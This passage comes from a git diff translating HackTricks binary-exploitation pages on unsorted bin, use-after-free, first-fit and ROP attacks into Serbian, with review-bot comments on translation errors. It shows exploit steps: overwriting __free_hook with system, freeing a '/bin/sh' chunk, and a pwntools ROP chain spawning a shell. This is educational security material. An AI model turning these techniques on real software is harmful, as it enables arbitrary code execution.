sada** (kompleksniji program može raditi druge alokacije i srušiti se), a da bismo to aktivirali, moramo **alokirati istu veličinu ili će se program srušiti.** > -> Note that overwriting **`global_max_fast`** might help in this case trusting that the fast bin will be able to take care of all the other allocations until the exploit is completed. 
+> Imajte na umu da prepisivanje **`global_max_fast`** može pomoći u ovom slučaju verujući da će fast bin moći da se brine o svim ostalim alokacijama dok se eksploatacija ne završi. -The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough so don't end in a Tcache you can see that the previously mentioned error appears preventing this technique: **`malloc(): unsorted double linked list corrupted`** +Kod od [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) to vrlo dobro objašnjava, iako ako modifikujete malloc-ove da alocirate dovoljno veliku memoriju da ne završite u Tcache-u, možete videti da se prethodno pomenuta greška pojavljuje sprečavajući ovu tehniku: **`malloc(): unsorted double linked list corrupted`** ## Unsorted Bin Infoleak Attack -This is actually a very basic concept. The chunks in the unsorted bin are going to have pointers. The first chunk in the unsorted bin will actually have the **`fd`** and the **`bk`** links **pointing to a part of the main arena (Glibc)**.\ -Therefore, if you can **put a chunk inside a unsorted bin and read it** (use after free) or **allocate it again without overwriting at least 1 of the pointers** to then **read** it, you can have a **Glibc info leak**. +Ovo je zapravo vrlo osnovni koncept. Chunk-ovi u unsorted bin-u će imati pokazivače. Prvi chunk u unsorted bin-u će zapravo imati **`fd`** i **`bk`** linkove **koji pokazuju na deo glavne arene (Glibc)**.\ +Stoga, ako možete **staviti chunk unutar unsorted bin-a i pročitati ga** (use after free) ili **ponovo ga alocirati bez prepisivanja barem 1 od pokazivača** da biste zatim **pročitali** ga, možete imati **Glibc info leak**. 
-A similar [**attack used in this writeup**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html), was to abuse a 4 chunks structure (A, B, C and D - D is only to prevent consolidation with top chunk) so a null byte overflow in B was used to make C indicate that B was unused. Also, in B the `prev_size` data was modified so the size instead of being the size of B was A+B.\ -Then C was deallocated, and consolidated with A+B (but B was still in used). A new chunk of size A was allocated and then the libc leaked addresses was written into B from where they were leaked. +Sličan [**napad korišćen u ovom izveštaju**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html), bio je zloupotreba strukture od 4 chunk-a (A, B, C i D - D je samo da spreči konsolidaciju sa top chunk-om) tako da je korišćen null byte overflow u B da bi C ukazivao da je B neiskorišćen. Takođe, u B su podaci `prev_size` modifikovani tako da je veličina umesto veličine B bila A+B.\ +Zatim je C dealokiran, i konsolidovan sa A+B (ali B je još uvek bio u upotrebi). Novi chunk veličine A je alociran i zatim su adrese libc otkrivene upisane u B odakle su otkrivene. ## References & Other examples - [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap) - - The goal is to overwrite a global variable with a value greater than 4869 so it's possible to get the flag and PIE is not enabled. - - It's possible to generate chunks of arbitrary sizes and there is a heap overflow with the desired size. - - The attack starts creating 3 chunks: chunk0 to abuse the overflow, chunk1 to be overflowed and chunk2 so top chunk doesn't consolidate the previous ones. 
- - Then, chunk1 is freed and chunk0 is overflowed to the `bk` pointer of chunk1 points to: `bk = magic - 0x10` - - Then, chunk3 is allocated with the same size as chunk1, which will trigger the unsorted bin attack and will modify the value of the global variable, making possible to get the flag. +- Cilj je prepisati globalnu promenljivu sa vrednošću većom od 4869 kako bi bilo moguće dobiti zastavicu i PIE nije omogućen. +- Moguće je generisati chunk-ove proizvoljnih veličina i postoji heap overflow sa željenom veličinom. +- Napad počinje kreiranjem 3 chunk-a: chunk0 za zloupotrebu overflow-a, chunk1 da bude overflow-ovan i chunk2 da top chunk ne konsoliduje prethodne. +- Zatim, chunk1 se oslobađa i chunk0 se overflow-uje tako da `bk` pokazivač chunk-a1 pokazuje na: `bk = magic - 0x10` +- Zatim, chunk3 se alocira sa istom veličinom kao chunk1, što će aktivirati unsorted bin napad i modifikovati vrednost globalne promenljive, omogućavajući dobijanje zastavice. - [**https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html**](https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html) - - The merge function is vulnerable because if both indexes passed are the same one it'll realloc on it and then free it but returning a pointer to that freed region that can be used. - - Therefore, **2 chunks are created**: **chunk0** which will be merged with itself and chunk1 to prevent consolidating with the top chunk. Then, the **merge function is called with chunk0** twice which will cause a use after free. - - Then, the **`view`** function is called with index 2 (which the index of the use after free chunk), which will **leak a libc address**. - - As the binary has protections to only malloc sizes bigger than **`global_max_fast`** so no fastbin is used, an unsorted bin attack is going to be used to overwrite the global variable `global_max_fast`. 
- - Then, it's possible to call the edit function with the index 2 (the use after free pointer) and overwrite the `bk` pointer to point to `p64(global_max_fast-0x10)`. Then, creating a new chunk will use the previously compromised free address (0x20) will **trigger the unsorted bin attack** overwriting the `global_max_fast` which a very big value, allowing now to create chunks in fast bins. - - Now a **fast bin attack** is performed: - - First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location: - -
gef➤  p &__free_hook
-      $1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
-      gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
-      0x7ff1e9e6074f: 0x0000000000000000      0x0000000000000200
-      0x7ff1e9e6075f: 0x0000000000000000      0x0000000000000000
-      0x7ff1e9e6076f <list_all_lock+15>:      0x0000000000000000      0x0000000000000000
-      0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000      0x0000000000000000
-      
- - If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed - - For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin. - - Then, the edit function is called in this chunk to modify the **`fd`** address of this fast bin to point to the previous **`__free_hook`** function. - - Then, a chunk with size `0x1f8` is created to retrieve from the fast bin the previous useless chunk so another chunk of size `0x1f8` is created to get a fast bin chunk in the **`__free_hook`** which is overwritten with the address of **`system`** function. - - And finally a chunk containing the string `/bin/sh\x00` is freed calling the delete function, triggering the **`__free_hook`** function which points to system with `/bin/sh\x00` as parameter. - - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html) - - Another example of abusing a 1B overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address +- Funkcija merge je ranjiva jer ako su oba prosleđena indeksa ista, ona će reallocirati na nju i zatim je osloboditi, ali vraćajući pokazivač na tu oslobođenu oblast koja se može koristiti. +- Stoga, **2 chunk-a su kreirana**: **chunk0** koji će se spojiti sa samim sobom i chunk1 da spreči konsolidaciju sa top chunk-om. Zatim, **merge funkcija se poziva sa chunk0** dva puta što će izazvati use after free. +- Zatim, **`view`** funkcija se poziva sa indeksom 2 (što je indeks chunk-a koji je use after free), što će **otkriti libc adresu**. 
+- Kako binarni fajl ima zaštite da samo malloc veličine veće od **`global_max_fast`** se koriste, koristiće se unsorted bin napad da prepiše globalnu promenljivu `global_max_fast`. +- Zatim, moguće je pozvati edit funkciju sa indeksom 2 (pokazivač use after free) i prepisati `bk` pokazivač da pokazuje na `p64(global_max_fast-0x10)`. Zatim, kreiranje novog chunk-a koristi prethodno kompromitovanu oslobođenu adresu (0x20) će **aktivirati unsorted bin napad** prepisujući `global_max_fast` sa veoma velikom vrednošću, omogućavajući sada kreiranje chunk-ova u fast bin-ovima. +- Sada se izvodi **fast bin napad**: +- Prvo je otkriveno da je moguće raditi sa fast **chunk-ovima veličine 200** na lokaciji **`__free_hook`**: +-
gef➤  p &__free_hook
+$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
+gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
+0x7ff1e9e6074f: 0x0000000000000000      0x0000000000000200
+0x7ff1e9e6075f: 0x0000000000000000      0x0000000000000000
+0x7ff1e9e6076f <list_all_lock+15>:      0x0000000000000000      0x0000000000000000
+0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000      0x0000000000000000
+
+- Ako uspemo da dobijemo fast chunk veličine 0x200 na ovoj lokaciji, biće moguće prepisati pokazivač funkcije koja će biti izvršena +- Za to, kreira se novi chunk veličine `0xfc` i merge funkcija se poziva sa tim pokazivačem dva puta, na ovaj način dobijamo pokazivač na oslobođeni chunk veličine `0xfc*2 = 0x1f8` u fast bin-u. +- Zatim, edit funkcija se poziva na ovom chunk-u da modifikuje **`fd`** adresu ovog fast bin-a da pokazuje na prethodnu **`__free_hook`** funkciju. +- Zatim, kreira se chunk veličine `0x1f8` da se povuče iz fast bin-a prethodni beskorisni chunk tako da se kreira još jedan chunk veličine `0x1f8` da se dobije fast bin chunk u **`__free_hook`** koji se prepisuje sa adresom funkcije **`system`**. +- I konačno, chunk koji sadrži string `/bin/sh\x00` se oslobađa pozivajući delete funkciju, aktivirajući **`__free_hook`** funkciju koja pokazuje na system sa `/bin/sh\x00` kao parametrom. +- **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html) +- Još jedan primer zloupotrebe 1B overflow-a za konsolidaciju chunk-ova u unsorted bin-u i dobijanje libc infoleak-a, a zatim izvođenje fast bin napada za prepisivanje malloc hook-a sa adresom jednog gadget-a. - [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/) - - We can only allocate chunks of size greater than `0x100`. - - Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits). - - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`. +- Možemo samo alocirati chunk-ove veličine veće od `0x100`. 
+- Prepisivanje `global_max_fast` koristeći Unsorted Bin napad (radi 1/16 puta zbog ASLR, jer moramo modifikovati 12 bita, ali moramo modifikovati 16 bita). +- Fast Bin napad za modifikaciju globalnog niza chunk-ova. Ovo daje proizvoljnu read/write primitivu, koja omogućava modifikaciju GOT-a i postavljanje neke funkcije da pokazuje na `system`. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/use-after-free/README.md b/src/binary-exploitation/libc-heap/use-after-free/README.md index d6fd34f42..044cfe6eb 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/README.md +++ b/src/binary-exploitation/libc-heap/use-after-free/README.md 
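Review bot: in the unsorted-bin-attack.md hunk the translated tip reproduces the source's corrupted opening `> T> aking a look` as `> P>ogledajte primer`, so the blockquote now starts with a broken word; it should read `> Pogledajte primer ...`, and the stray `>` inside the word deserves the same fix in the English line. Headings in this file stay English (`## Basic Information`, `## Unsorted Bin Infoleak Attack`, `## References & Other examples`) while the identical heading becomes `## Osnovne informacije` in use-after-free/README.md in this same patch; pick one convention. As in the unlink.md hunk, the nested list items and the indented gdb listing under `gef➤ p &__free_hook` have their leading whitespace stripped on the `+` lines (`-      $1 = (void (**)(void *, const void *)) ...` versus `+$1 = ...`), which changes the rendered list nesting and the alignment of the `x/60gx` output.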
@@ -2,16 +2,16 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -As the name implies, this vulnerability occurs when a program **stores some space** in the heap for an object, **writes** some info there, **frees** it apparently because it's not needed anymore and then **accesses it again**. +Kao što ime implicira, ova ranjivost se javlja kada program **čuva neki prostor** u heap-u za objekat, **upisuje** neke informacije tamo, **oslobađa** ga očigledno jer više nije potreban i zatim **ponovo pristupa** njemu. -The problem here is that it's not ilegal (there **won't be errors**) when a **freed memory is accessed**. So, if the program (or the attacker) managed to **allocate the freed memory and store arbitrary data**, when the freed memory is accessed from the initial pointer that **data would be have been overwritten** causing a **vulnerability that will depends on the sensitivity of the data** that was stored original (if it was a pointer of a function that was going to be be called, an attacker could know control it). +Problem ovde je što nije ilegalno (neće biti grešaka) kada se **pristupi oslobođenoj memoriji**. Dakle, ako je program (ili napadač) uspeo da **alokira oslobođenu memoriju i sačuva proizvoljne podatke**, kada se oslobođena memorija pristupi iz inicijalnog pokazivača, **ti podaci bi bili prepisani**, uzrokujući **ranjivost koja će zavisiti od osetljivosti podataka** koji su prvobitno sačuvani (ako je to bio pokazivač funkcije koja će biti pozvana, napadač bi mogao da je kontroliše). -### First Fit attack +### Prvi Fit napad -A first fit attack targets the way some memory allocators, like in glibc, manage freed memory. When you free a block of memory, it gets added to a list, and new memory requests pull from that list from the end. Attackers can use this behavior to manipulate **which memory blocks get reused, potentially gaining control over them**. 
This can lead to "use-after-free" issues, where an attacker could **change the contents of memory that gets reallocated**, creating a security risk.\ -Check more info in: +Prvi fit napad cilja način na koji neki alokatori memorije, poput glibc-a, upravljaju oslobođenom memorijom. Kada oslobodite blok memorije, on se dodaje na listu, a novi zahtevi za memorijom uzimaju iz te liste sa kraja. Napadači mogu iskoristiti ovo ponašanje da manipulišu **koji se blokovi memorije ponovo koriste, potencijalno stičući kontrolu nad njima**. To može dovesti do problema "use-after-free", gde bi napadač mogao **promeniti sadržaj memorije koja se ponovo alocira**, stvarajući bezbednosni rizik.\ +Proverite više informacija u: {{#ref}} first-fit.md diff --git a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md index 7bab07aea..7d39c526e 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md +++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md 
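Review bot: `### Prvi Fit napad` half-translates the technique name; first-fit.md in this same patch keeps `## **First Fit**` untranslated and this heading links to that file, so keep "First Fit" as-is (`### First Fit napad`) for consistency and searchability. Also "kada se oslobođena memorija pristupi" has the wrong case, since "pristupiti" takes the dative ("kada se pristupi oslobođenoj memoriji", as the first sentence of the same paragraph already has it), and "nije ilegalno" is a calque where "nije zabranjeno" or "nije greška" reads naturally.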
@@ -4,36 +4,33 @@ ## **First Fit** -When you free memory in a program using glibc, different "bins" are used to manage the memory chunks. Here's a simplified explanation of two common scenarios: unsorted bins and fastbins. +Kada oslobodite memoriju u programu koristeći glibc, različiti "bineri" se koriste za upravljanje delovima memorije. Evo pojednostavljenog objašnjenja dva uobičajena scenarija: neusortirani bineri i brzi bineri. -### Unsorted Bins +### Neusortirani Bineri -When you free a memory chunk that's not a fast chunk, it goes to the unsorted bin. This bin acts like a list where new freed chunks are added to the front (the "head"). When you request a new chunk of memory, the allocator looks at the unsorted bin from the back (the "tail") to find a chunk that's big enough. If a chunk from the unsorted bin is bigger than what you need, it gets split, with the front part being returned and the remaining part staying in the bin. +Kada oslobodite deo memorije koji nije brzi deo, on ide u neusortirani bin. Ovaj bin deluje kao lista gde se novi oslobođeni delovi dodaju na početak (glavu). Kada zatražite novi deo memorije, alokator gleda neusortirani bin od pozadi (rep) da pronađe deo koji je dovoljno velik. Ako je deo iz neusortiranog bina veći od onoga što vam treba, on se deli, pri čemu se prednji deo vraća, a preostali deo ostaje u binu. -Example: - -- You allocate 300 bytes (`a`), then 250 bytes (`b`), the free `a` and request again 250 bytes (`c`). -- When you free `a`, it goes to the unsorted bin. -- If you then request 250 bytes again, the allocator finds `a` at the tail and splits it, returning the part that fits your request and keeping the rest in the bin. - - `c` will be pointing to the previous `a` and filled with the `a's`. +Primer: +- Alocirate 300 bajtova (`a`), zatim 250 bajtova (`b`), oslobodite `a` i ponovo zatražite 250 bajtova (`c`). +- Kada oslobodite `a`, on ide u neusortirani bin. 
+- Ako zatim ponovo zatražite 250 bajtova, alokator pronalazi `a` na repu i deli ga, vraćajući deo koji odgovara vašem zahtevu i zadržavajući ostatak u binu. +- `c` će pokazivati na prethodni `a` i biti ispunjen sa `a's`. ```c char *a = malloc(300); char *b = malloc(250); free(a); char *c = malloc(250); ``` - ### Fastbins -Fastbins are used for small memory chunks. Unlike unsorted bins, fastbins add new chunks to the head, creating a last-in-first-out (LIFO) behavior. If you request a small chunk of memory, the allocator will pull from the fastbin's head. +Fastbins se koriste za male delove memorije. Za razliku od nesortiranih binova, fastbins dodaju nove delove na početak, stvarajući ponašanje poslednji ulaz, prvi izlaz (LIFO). Ako zatražite mali deo memorije, alokator će uzeti iz vrha fastbina. -Example: - -- You allocate four chunks of 20 bytes each (`a`, `b`, `c`, `d`). -- When you free them in any order, the freed chunks are added to the fastbin's head. -- If you then request a 20-byte chunk, the allocator will return the most recently freed chunk from the head of the fastbin. +Primer: +- Alocirate četiri dela od po 20 bajtova (`a`, `b`, `c`, `d`). +- Kada ih oslobodite u bilo kom redosledu, oslobođeni delovi se dodaju na vrh fastbina. +- Ako zatim zatražite deo od 20 bajtova, alokator će vratiti najnovije oslobođeni deo iz vrha fastbina. ```c char *a = malloc(20); char *b = malloc(20); 
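Review bot: the hunk renders "unsorted bins" two different ways within a few lines, `### Neusortirani Bineri` in the heading and "Za razliku od nesortiranih binova" in the fastbin paragraph, while "fastbins" stays English in `### Fastbins` / "iz vrha fastbina" and unsorted-bin-attack.md keeps "unsorted bin" untouched; these are glibc bin names, so keep `unsorted bin` and `fastbin` everywhere rather than coining "bineri". The hunk also deletes the blank lines that separated "Example:" from its list and the closing fence from `### Fastbins` (the empty `-` lines); those removals are unrelated to translation and should stay out of this patch.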
@@ -48,17 +45,16 @@ b = malloc(20); // c c = malloc(20); // b d = malloc(20); // a ``` - -## Other References & Examples +## Ostale reference i primeri - [**https://heap-exploitation.dhavalkapil.com/attacks/first_fit**](https://heap-exploitation.dhavalkapil.com/attacks/first_fit) - [**https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/**](https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/) - - ARM64. Use after free: Generate an user object, free it, generate an object that gets the freed chunk and allow to write to it, **overwriting the position of user->password** from the previous one. Reuse the user to **bypass the password check** +- ARM64. Use after free: Generišite korisnički objekat, oslobodite ga, generišite objekat koji dobija oslobođeni deo i omogućite pisanje u njega, **prepisujući poziciju user->password** iz prethodnog. Ponovo upotrebite korisnika da **obiđete proveru lozinke** - [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/use_after_free/#example**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/use_after_free/#example) - - The program allows to create notes. A note will have the note info in a malloc(8) (with a pointer to a function that could be called) and a pointer to another malloc(\) with the contents of the note. - - The attack would be to create 2 notes (note0 and note1) with bigger malloc contents than the note info size and then free them so they get into the fast bin (or tcache). - - Then, create another note (note2) with content size 8. The content is going to be in note1 as the chunk is going to be reused, were we could modify the function pointer to point to the win function and then Use-After-Free the note1 to call the new function pointer. +- Program omogućava kreiranje beleški. Beleška će imati informacije o belešci u malloc(8) (sa pokazivačem na funkciju koja može biti pozvana) i pokazivač na drugi malloc(\) sa sadržajem beleške. 
+- Napad bi bio da se kreiraju 2 beleške (note0 i note1) sa većim malloc sadržajem nego što je veličina informacija o belešci, a zatim ih osloboditi kako bi ušle u brzi bin (ili tcache). +- Zatim, kreirajte još jednu belešku (note2) sa veličinom sadržaja 8. Sadržaj će biti u note1 jer će se deo ponovo koristiti, gde bismo mogli da modifikujemo pokazivač funkcije da pokazuje na win funkciju i zatim Use-After-Free note1 da pozovemo novi pokazivač funkcije. - [**https://guyinatuxedo.github.io/26-heap_grooming/pico_areyouroot/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/pico_areyouroot/index.html) - - It's possible to alloc some memory, write the desired value, free it, realloc it and as the previous data is still there, it will treated according the new expected struct in the chunk making possible to set the value ot get the flag. +- Moguće je alocirati neku memoriju, napisati željenu vrednost, osloboditi je, ponovo alocirati i pošto su prethodni podaci još uvek prisutni, biće tretirani prema novoj očekivanoj strukturi u delu, što omogućava postavljanje vrednosti za dobijanje zastavice. - [**https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html) - - In this case it's needed to write 4 inside an specific chunk which is the first one being allocated (even after force freeing all of them). On each new allocated chunk it's number in the array index is stored. Then, allocate 4 chunks (+ the initialy allocated), the last one will have 4 inside of it, free them and force the reallocation of the first one, which will use the last chunk freed which is the one with 4 inside of it. +- U ovom slučaju potrebno je napisati 4 unutar specifičnog dela koji je prvi koji se alocira (čak i nakon prisilnog oslobađanja svih njih). Na svakom novom alociranom delu, njegov broj u indeksu niza se čuva. 
Zatim, alocirajte 4 dela (+ inicijalno alocirani), poslednji će imati 4 unutar njega, oslobodite ih i prisilite ponovnu alokaciju prvog, koji će koristiti poslednji oslobođeni deo koji je onaj sa 4 unutar njega. diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md index 29e21bca5..5a4b1dfe5 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/README.md 
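Review bot: the nested explanations under each reference (`-  - The program allows to create notes...`, `-  - It's possible to alloc some memory...`) are flattened into top-level `+- ` items, so they no longer hang under the link they describe; keep the two-space indentation of the original. Also `malloc(\)` is carried over with a stray backslash and no argument placeholder in both old and new lines; restore what the source intended there instead of propagating the broken escape.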
@@ -2,45 +2,44 @@ {{#include ../../banners/hacktricks-training.md}} -## **Basic Information** +## **Osnovne Informacije** -**Return-Oriented Programming (ROP)** is an advanced exploitation technique used to circumvent security measures like **No-Execute (NX)** or **Data Execution Prevention (DEP)**. Instead of injecting and executing shellcode, an attacker leverages pieces of code already present in the binary or in loaded libraries, known as **"gadgets"**. Each gadget typically ends with a `ret` instruction and performs a small operation, such as moving data between registers or performing arithmetic operations. By chaining these gadgets together, an attacker can construct a payload to perform arbitrary operations, effectively bypassing NX/DEP protections. +**Return-Oriented Programming (ROP)** je napredna tehnika eksploatacije koja se koristi za zaobilaženje sigurnosnih mera kao što su **No-Execute (NX)** ili **Data Execution Prevention (DEP)**. Umesto da se injektuje i izvršava shellcode, napadač koristi delove koda koji su već prisutni u binarnom fajlu ili u učitanim bibliotekama, poznatim kao **"gadgets"**. Svaki gadget obično se završava sa `ret` instrukcijom i izvršava malu operaciju, kao što je premestanje podataka između registara ili izvođenje aritmetičkih operacija. Povezivanjem ovih gadgets, napadač može konstruisati payload za izvođenje proizvoljnih operacija, efikasno zaobilazeći NX/DEP zaštite. -### How ROP Works +### Kako ROP Funkcioniše -1. **Control Flow Hijacking**: First, an attacker needs to hijack the control flow of a program, typically by exploiting a buffer overflow to overwrite a saved return address on the stack. -2. **Gadget Chaining**: The attacker then carefully selects and chains gadgets to perform the desired actions. This could involve setting up arguments for a function call, calling the function (e.g., `system("/bin/sh")`), and handling any necessary cleanup or additional operations. -3. 
**Payload Execution**: When the vulnerable function returns, instead of returning to a legitimate location, it starts executing the chain of gadgets. +1. **Otimaње Kontrole Tok**: Prvo, napadač treba da otme kontrolu toka programa, obično iskorišćavanjem buffer overflow-a da bi prepisao sačuvanu adresu povratka na steku. +2. **Povezivanje Gadgets**: Napadač pažljivo bira i povezuje gadgets da bi izvršio željene radnje. Ovo može uključivati postavljanje argumenata za poziv funkcije, pozivanje funkcije (npr., `system("/bin/sh")`), i rukovanje svim potrebnim čišćenjem ili dodatnim operacijama. +3. **Izvršenje Payload-a**: Kada ranjiva funkcija vrati, umesto da se vrati na legitimnu lokaciju, počinje da izvršava lanac gadgets. -### Tools +### Alati -Typically, gadgets can be found using [**ROPgadget**](https://github.com/JonathanSalwan/ROPgadget), [**ropper**](https://github.com/sashs/Ropper) or directly from **pwntools** ([ROP](https://docs.pwntools.com/en/stable/rop/rop.html)). +Obično se gadgets mogu pronaći koristeći [**ROPgadget**](https://github.com/JonathanSalwan/ROPgadget), [**ropper**](https://github.com/sashs/Ropper) ili direktno iz **pwntools** ([ROP](https://docs.pwntools.com/en/stable/rop/rop.html)). -## ROP Chain in x86 Example +## ROP Lanac u x86 Primeru -### **x86 (32-bit) Calling conventions** +### **x86 (32-bit) Konvencije Poziva** -- **cdecl**: The caller cleans the stack. Function arguments are pushed onto the stack in reverse order (right-to-left). **Arguments are pushed onto the stack from right to left.** -- **stdcall**: Similar to cdecl, but the callee is responsible for cleaning the stack. +- **cdecl**: Pozivatelj čisti stek. Argumenti funkcije se stavljaju na stek u obrnutom redosledu (s desna na levo). **Argumenti se stavljaju na stek s desna na levo.** +- **stdcall**: Slično cdecl, ali je pozvana funkcija odgovorna za čišćenje steka. 
-### **Finding Gadgets** +### **Pronalaženje Gadgets** -First, let's assume we've identified the necessary gadgets within the binary or its loaded libraries. The gadgets we're interested in are: +Prvo, pretpostavimo da smo identifikovali potrebne gadgets unutar binarnog fajla ili njegovih učitanih biblioteka. Gadgets koji nas zanimaju su: -- `pop eax; ret`: This gadget pops the top value of the stack into the `EAX` register and then returns, allowing us to control `EAX`. -- `pop ebx; ret`: Similar to the above, but for the `EBX` register, enabling control over `EBX`. -- `mov [ebx], eax; ret`: Moves the value in `EAX` to the memory location pointed to by `EBX` and then returns. This is often called a **write-what-where gadget**. -- Additionally, we have the address of the `system()` function available. +- `pop eax; ret`: Ovaj gadget uzima gornju vrednost steka u `EAX` registar i zatim se vraća, omogućavajući nam kontrolu nad `EAX`. +- `pop ebx; ret`: Slično prethodnom, ali za `EBX` registar, omogućavajući kontrolu nad `EBX`. +- `mov [ebx], eax; ret`: Premesti vrednost u `EAX` na memorijsku lokaciju na koju pokazuje `EBX` i zatim se vraća. Ovo se često naziva **write-what-where gadget**. +- Pored toga, imamo adresu funkcije `system()` dostupnu. -### **ROP Chain** +### **ROP Lanac** -Using **pwntools**, we prepare the stack for the ROP chain execution as follows aiming to execute `system('/bin/sh')`, note how the chain starts with: - -1. A `ret` instruction for alignment purposes (optional) -2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/)) -3. Placeholder for the return address from `system()` -4. `"/bin/sh"` string address (parameter for system function) +Koristeći **pwntools**, pripremamo stek za izvršenje ROP lanca na sledeći način sa ciljem da izvršimo `system('/bin/sh')`, obratite pažnju kako lanac počinje sa: +1. `ret` instrukcijom za svrhe usklađivanja (opciono) +2. 
Adresom funkcije `system` (pretpostavljajući da je ASLR onemogućen i poznat libc, više informacija u [**Ret2lib**](ret2lib/)) +3. Mesto za adresu povratka iz `system()` +4. Adresom stringa `"/bin/sh"` (parametar za funkciju system) ```python from pwn import * @@ -59,10 +58,10 @@ ret_gadget = 0xcafebabe # This could be any gadget that allows us to control th # Construct the ROP chain rop_chain = [ - ret_gadget, # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues - system_addr, # Address of system(). Execution will continue here after the ret gadget - 0x41414141, # Placeholder for system()'s return address. This could be the address of exit() or another safe place. - bin_sh_addr # Address of "/bin/sh" string goes here, as the argument to system() +ret_gadget, # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues +system_addr, # Address of system(). Execution will continue here after the ret gadget +0x41414141, # Placeholder for system()'s return address. This could be the address of exit() or another safe place. +bin_sh_addr # Address of "/bin/sh" string goes here, as the argument to system() ] # Flatten the rop_chain for use 
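Review bot: the list item "+1. **Otimaње Kontrole Tok**" mixes a Cyrillic "њ" into a Latin-script word and drops the genitive ending; it should read "Otimanje kontrole toka". Same hunk: "Kada ranjiva funkcija vrati" needs the reflexive ("se vrati"), and "Povezivanjem ovih gadgets" / "lanac gadgets" keep the English plural while the file elsewhere uses "gadgeta"; pick one form and use it throughout.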
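Review bot: the `@@ -59,10 +58,10 @@` hunk only strips the four-space indentation inside the `rop_chain` list (`-    ret_gadget,` becomes `+ret_gadget,`) while leaving the English comments untouched, so it changes code in a fenced block without translating anything; the list still parses, but a translation commit should leave code verbatim. Suggest restoring the original indentation.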
@@ -74,28 +73,26 @@ payload = fit({offset: rop_chain}) p.sendline(payload) p.interactive() ``` - ## ROP Chain in x64 Example ### **x64 (64-bit) Calling conventions** -- Uses the **System V AMD64 ABI** calling convention on Unix-like systems, where the **first six integer or pointer arguments are passed in the registers `RDI`, `RSI`, `RDX`, `RCX`, `R8`, and `R9`**. Additional arguments are passed on the stack. The return value is placed in `RAX`. -- **Windows x64** calling convention uses `RCX`, `RDX`, `R8`, and `R9` for the first four integer or pointer arguments, with additional arguments passed on the stack. The return value is placed in `RAX`. -- **Registers**: 64-bit registers include `RAX`, `RBX`, `RCX`, `RDX`, `RSI`, `RDI`, `RBP`, `RSP`, and `R8` to `R15`. +- Koristi **System V AMD64 ABI** konvenciju poziva na Unix-like sistemima, gde se **prvih šest celobrojnih ili pokazivačkih argumenata prenosi u registrima `RDI`, `RSI`, `RDX`, `RCX`, `R8`, i `R9`**. Dodatni argumenti se prenose na steku. Vraćena vrednost se smešta u `RAX`. +- **Windows x64** konvencija poziva koristi `RCX`, `RDX`, `R8`, i `R9` za prva četiri celobrojna ili pokazivačka argumenta, dok se dodatni argumenti prenose na steku. Vraćena vrednost se smešta u `RAX`. +- **Registri**: 64-bitni registri uključuju `RAX`, `RBX`, `RCX`, `RDX`, `RSI`, `RDI`, `RBP`, `RSP`, i `R8` do `R15`. #### **Finding Gadgets** -For our purpose, let's focus on gadgets that will allow us to set the **RDI** register (to pass the **"/bin/sh"** string as an argument to **system()**) and then call the **system()** function. We'll assume we've identified the following gadgets: +Za naše potrebe, fokusiraćemo se na gadgete koji će nam omogućiti da postavimo **RDI** registar (da prenesemo **"/bin/sh"** string kao argument za 